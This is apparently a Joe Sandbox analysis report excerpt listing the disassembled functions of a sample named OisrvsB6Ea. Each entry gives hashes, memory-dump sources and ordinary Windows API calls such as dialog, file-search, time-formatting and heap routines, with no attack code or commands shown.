                                                                                  • Opcode ID: 914d9b1deab97978c3c40919c1b9d662beb568c028d7ef071495e2c7d0ffec93
                                                                                  • Instruction ID: 30613f0b8f3b71062fdff54c289f9e030a86db54d08021706da7a00f09cd3611
                                                                                  • Opcode Fuzzy Hash: 914d9b1deab97978c3c40919c1b9d662beb568c028d7ef071495e2c7d0ffec93
                                                                                  • Instruction Fuzzy Hash: 0FC0123245C142BECB015BB4EC0DC2B7BA8AB95311F04C909B0A9C0060C238C510DB12
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 71e4cdca814be8783348149d535b7fd7a376514995d8bb7a85faa01bd08378cd
                                                                                  • Instruction ID: 27cce48c6160c7edeef7891fcdb84e81877fd398c132e0364087fcaec2c70df4
                                                                                  • Opcode Fuzzy Hash: 71e4cdca814be8783348149d535b7fd7a376514995d8bb7a85faa01bd08378cd
                                                                                  • Instruction Fuzzy Hash: 62C1D530A202559FEF25CF6CC485BA97BA5EF15314F0881BAEC499B382DB309D74CB61
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 885e79f5ed35fd63d81a6609805037845d17140db550c450ed4cc7ffc80b5df2
                                                                                  • Instruction ID: 6f9b80773873d8a1b73f912fe046a82e090127931c43f6493f98c5265fd87169
                                                                                  • Opcode Fuzzy Hash: 885e79f5ed35fd63d81a6609805037845d17140db550c450ed4cc7ffc80b5df2
                                                                                  • Instruction Fuzzy Hash: 6471CF71121B459ECB25EF74C8519EBB7E9AF14300F40882EE2AF83241DA3266A8DF11
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00278289
                                                                                    • Part of subcall function 002713DC: __EH_prolog.LIBCMT ref: 002713E1
                                                                                    • Part of subcall function 0027A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0027A598
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$CloseFind
                                                                                  • String ID:
                                                                                  • API String ID: 2506663941-0
                                                                                  • Opcode ID: 2dd0800cb80e5ff9b3933b959f6817269fa6d4a2909609c1b3096b79c7794415
                                                                                  • Instruction ID: f31a16a79ec8dd1fb69436a491b8098c10971f654b647e37e846141c250ca54b
                                                                                  • Opcode Fuzzy Hash: 2dd0800cb80e5ff9b3933b959f6817269fa6d4a2909609c1b3096b79c7794415
                                                                                  • Instruction Fuzzy Hash: 4841CB719646559ADB20EB64CC59AE9B378BF00304F4484EBE58EA7083EB745FD4CF50
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 002713E1
                                                                                    • Part of subcall function 00275E37: __EH_prolog.LIBCMT ref: 00275E3C
                                                                                    • Part of subcall function 0027CE40: __EH_prolog.LIBCMT ref: 0027CE45
                                                                                    • Part of subcall function 0027B505: __EH_prolog.LIBCMT ref: 0027B50A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 6ed1693df120896d107d9eaaf923d8ab1086fda995ed14e4b15fe0c315501dec
                                                                                  • Instruction ID: 7fa8cd95cb884cebae06ad12efc5157780216380a0fa5fe46a320819ea00a4d8
                                                                                  • Opcode Fuzzy Hash: 6ed1693df120896d107d9eaaf923d8ab1086fda995ed14e4b15fe0c315501dec
                                                                                  • Instruction Fuzzy Hash: 2C4148B0915B419EE724DF398885AE6FBE5BF19310F50492EE5EE83282CB716664CB10
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 002713E1
                                                                                    • Part of subcall function 00275E37: __EH_prolog.LIBCMT ref: 00275E3C
                                                                                    • Part of subcall function 0027CE40: __EH_prolog.LIBCMT ref: 0027CE45
                                                                                    • Part of subcall function 0027B505: __EH_prolog.LIBCMT ref: 0027B50A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: c93e04e4ac9d08f2d5601d7711777fbc6501df9b1b56710974b2a47e8f44b537
                                                                                  • Instruction ID: 73027261fe779f5c5c5e32de8df93be7135f6db3648da34558e5651aa9577d54
                                                                                  • Opcode Fuzzy Hash: c93e04e4ac9d08f2d5601d7711777fbc6501df9b1b56710974b2a47e8f44b537
                                                                                  • Instruction Fuzzy Hash: 2E4137B0915B419AE724DF798885AE6FBE5BF19300F50492ED5FE83282CB716664CB10
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 60932c036cb13bf720f1803461570f5ce1957153b4909913aba0b565c3f300fb
                                                                                  • Instruction ID: 19385680c2cd2bfaefebfe042634d045e8127a7f16c83ab02348b9bfc32597d2
                                                                                  • Opcode Fuzzy Hash: 60932c036cb13bf720f1803461570f5ce1957153b4909913aba0b565c3f300fb
                                                                                  • Instruction Fuzzy Hash: 682139B9E21212ABDF14EF78CC4165A776CFF14714F00013AA505A66C1E7709A20CBA8
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0028B098
                                                                                    • Part of subcall function 002713DC: __EH_prolog.LIBCMT ref: 002713E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: c47b31dce8cd7611c421bb31f478ffd0d069cb144f17e51cd63f8d022295e538
                                                                                  • Instruction ID: b3775d9dd722a58c55fdc59935e58483617c284781afb713eff11ebd05f88d67
                                                                                  • Opcode Fuzzy Hash: c47b31dce8cd7611c421bb31f478ffd0d069cb144f17e51cd63f8d022295e538
                                                                                  • Instruction Fuzzy Hash: D3318D75C21249DBCF15EF68C8519EEB7B4AF09300F10449EE409B7282D735AE24CFA1
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0029ACF8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID:
                                                                                  • API String ID: 190572456-0
                                                                                  • Opcode ID: a010df36d299a2d9e0ec0a7ea5f7fe8ca2db21f42f3ab9eff55d05d90c3e1999
                                                                                  • Instruction ID: 7207b47f9413dd27b7cc55204f56d71df306a02612bd466fa40e248c4680b691
                                                                                  • Opcode Fuzzy Hash: a010df36d299a2d9e0ec0a7ea5f7fe8ca2db21f42f3ab9eff55d05d90c3e1999
                                                                                  • Instruction Fuzzy Hash: 27112933A20326AF9F26DE28EC4485AB395EB853207164221FC15EF254DB30DC2287E2
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  APIs
                                                                                    • Part of subcall function 0029B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00299813,00000001,00000364,?,002940EF,?,?,002B1098), ref: 0029B177
                                                                                  • _free.LIBCMT ref: 0029C4E5
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 614378929-0
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00299813,00000001,00000364,?,002940EF,?,?,002B1098), ref: 0029B177
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00293C3F
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID:
                                                                                  • API String ID: 190572456-0
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00294286,?,0000015D,?,?,?,?,00295762,000000FF,00000000,?,?), ref: 00298E38
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00275AC2
                                                                                    • Part of subcall function 0027B505: __EH_prolog.LIBCMT ref: 0027B50A
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  APIs
                                                                                    • Part of subcall function 0027A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0027A592,000000FF,?,?), ref: 0027A6C4
                                                                                    • Part of subcall function 0027A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0027A592,000000FF,?,?), ref: 0027A6F2
                                                                                    • Part of subcall function 0027A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0027A592,000000FF,?,?), ref: 0027A6FE
                                                                                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0027A598
                                                                                  Similarity
                                                                                  • API ID: Find$FileFirst$CloseErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1464966427-0
                                                                                  APIs
                                                                                  • SetThreadExecutionState.KERNEL32(00000001), ref: 00280E3D
                                                                                  Similarity
                                                                                  • API ID: ExecutionStateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2211380416-0
                                                                                  APIs
                                                                                  • GdipAlloc.GDIPLUS(00000010), ref: 0028A62C
                                                                                    • Part of subcall function 0028A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0028A3DA
                                                                                  Similarity
                                                                                  • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                  • String ID:
                                                                                  • API String ID: 1915507550-0
                                                                                  APIs
                                                                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00281B3E), ref: 0028DD92
                                                                                    • Part of subcall function 0028B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028B579
                                                                                    • Part of subcall function 0028B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028B58A
                                                                                    • Part of subcall function 0028B568: IsDialogMessageW.USER32(0001047E,?), ref: 0028B59E
                                                                                    • Part of subcall function 0028B568: TranslateMessage.USER32(?), ref: 0028B5AC
                                                                                    • Part of subcall function 0028B568: DispatchMessageW.USER32(?), ref: 0028B5B6
                                                                                  Similarity
                                                                                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 897784432-0
                                                                                  APIs
                                                                                  • DloadProtectSection.DELAYIMP ref: 0028E5E3
                                                                                  Similarity
                                                                                  • API ID: DloadProtectSection
                                                                                  • String ID:
                                                                                  • API String ID: 2203082970-0
                                                                                  APIs
                                                                                  • GetFileType.KERNELBASE(000000FF,002797BE), ref: 002798C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: FileType
                                                                                  • String ID:
                                                                                  • API String ID: 3081899298-0
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E3FC
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID:
                                                                                  • API String ID: 1269201914-0
                                                                                  APIs
                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E3FC
                                                                                    • Part of subcall function 0028E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028E8D0
                                                                                    • Part of subcall function 0028E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028E8E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                  • String ID:
                                                                                  • API String ID: 1269201914-0
                                                                                  • Opcode ID: fee95354b2fa7719a93cef21c736d38f486e74ae8141b54e5925a891aea89824
                                                                                  • Instruction ID: cd3dfa5dbb7fc607e73c6f1d2b50d4cfc9a70747fa6481fea85636cd61a3bbde
                                                                                  • Opcode Fuzzy Hash: fee95354b2fa7719a93cef21c736d38f486e74ae8141b54e5925a891aea89824
                                                                                  • Instruction Fuzzy Hash: AAA001EA2BA152BD3908B6516D06C3B021EC4C6F61332996EF816A58D1AC801C651E73
                                                                                  APIs
                                                                                  • SetEndOfFile.KERNELBASE(?,0027903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00279F0C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: File
                                                                                  • String ID:
                                                                                  • API String ID: 749574446-0
                                                                                  • Opcode ID: 0e5544ce5153cd29a6c237551b87c7e0497830d058b3e003e8f568a69e893324
                                                                                  • Instruction ID: c177b2776812ea5129f336b2592e73340b508bc7d0e6375f0bbec0adbe5641dc
                                                                                  • Opcode Fuzzy Hash: 0e5544ce5153cd29a6c237551b87c7e0497830d058b3e003e8f568a69e893324
                                                                                  • Instruction Fuzzy Hash: 5CA0113008000A8B8E002B30EA0800CBB20EB22BC030082A8A00ACA0A2CB22880B8A00
                                                                                  APIs
                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,0028AE72,C:\Users\user\Desktop,00000000,002B946A,00000006), ref: 0028AC08
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory
                                                                                  • String ID:
                                                                                  • API String ID: 1611563598-0
                                                                                  • Opcode ID: 6c5dd739f9d39034095643e69f0c187938dcdba984342f1c25add09096f59d83
                                                                                  • Instruction ID: e76452bfbdb0ead033af27d4386d0a734e5a08071bd159f45c7269d45cb14f46
                                                                                  • Opcode Fuzzy Hash: 6c5dd739f9d39034095643e69f0c187938dcdba984342f1c25add09096f59d83
                                                                                  • Instruction Fuzzy Hash: 53A011302002008B8A008B32AF0AA0EBAAAAFA2B00F00C028B00880030CB30C820BA00
                                                                                  APIs
                                                                                  • CloseHandle.KERNELBASE(000000FF,?,?,002795D6,?,?,?,?,?,002A2641,000000FF), ref: 0027963B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: 80924f9817835bf789cf32032bc420c870564c0a0891674c3f9941e235b3e1f3
                                                                                  • Instruction ID: db20bd5bf5f4ffdf02ff44774c6cd0e022fa6827a32d9698499c40bf0a835883
                                                                                  • Opcode Fuzzy Hash: 80924f9817835bf789cf32032bc420c870564c0a0891674c3f9941e235b3e1f3
                                                                                  • Instruction Fuzzy Hash: 4BF0E9300A1B069FDB308E24C458792B7EC6B13321F049B1ED0EA429F0D770A6ED8A40
                                                                                  APIs
                                                                                    • Part of subcall function 00271316: GetDlgItem.USER32(00000000,00003021), ref: 0027135A
                                                                                    • Part of subcall function 00271316: SetWindowTextW.USER32(00000000,002A35F4), ref: 00271370
                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0028C2B1
                                                                                  • EndDialog.USER32(?,00000006), ref: 0028C2C4
                                                                                  • GetDlgItem.USER32(?,0000006C), ref: 0028C2E0
                                                                                  • SetFocus.USER32(00000000), ref: 0028C2E7
                                                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0028C321
                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0028C358
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0028C36E
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0028C38C
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0028C39C
                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0028C3B8
                                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0028C3D4
                                                                                  • _swprintf.LIBCMT ref: 0028C404
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0028C417
                                                                                  • FindClose.KERNEL32(00000000), ref: 0028C41E
                                                                                  • _swprintf.LIBCMT ref: 0028C477
                                                                                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 0028C48A
                                                                                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0028C4A7
                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0028C4C7
                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0028C4D7
                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0028C4F1
                                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0028C509
                                                                                  • _swprintf.LIBCMT ref: 0028C535
                                                                                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0028C548
                                                                                  • _swprintf.LIBCMT ref: 0028C59C
                                                                                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 0028C5AF
                                                                                    • Part of subcall function 0028AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0028AF35
                                                                                    • Part of subcall function 0028AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,002AE72C,?,?), ref: 0028AF84
                                                                                  Strings
                                                                                  Memory Dump Source
